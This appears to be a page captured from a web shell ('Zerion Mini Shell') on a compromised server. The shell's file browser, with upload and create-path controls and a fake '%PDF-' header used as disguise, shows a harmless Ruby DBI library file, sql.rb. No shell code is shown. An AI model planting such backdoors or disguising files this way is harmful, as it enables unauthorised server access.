%PDF- %PDF-
Mini Shell

Mini Shell

Direktori : /home/rs/ruby/1.8/lib/ruby/site_ruby/1.8/dbi/
Upload File :
Create Path :
Current File : /home/rs/ruby/1.8/lib/ruby/site_ruby/1.8/dbi/sql.rb

#
# $Id: sql.rb,v 1.3 2006/03/27 20:25:02 francis Exp $
#
# parts extracted from Jim Weirichs DBD::Pg
#

require "dbi/utils"
require "time"

module DBI
    # the SQL package contains assistance for DBDs and generally will not be
    # needed outside of them.
    module SQL
        # Helper to determine if the statement is a query. Very crude and
        # should not be relied on for accuracy.
        def self.query?(sql)
            sql =~ /^\s*select\b/i
        end
    end # module SQL
end # module DBI

require 'dbi/sql/preparedstatement'

Zerion Mini Shell 1.0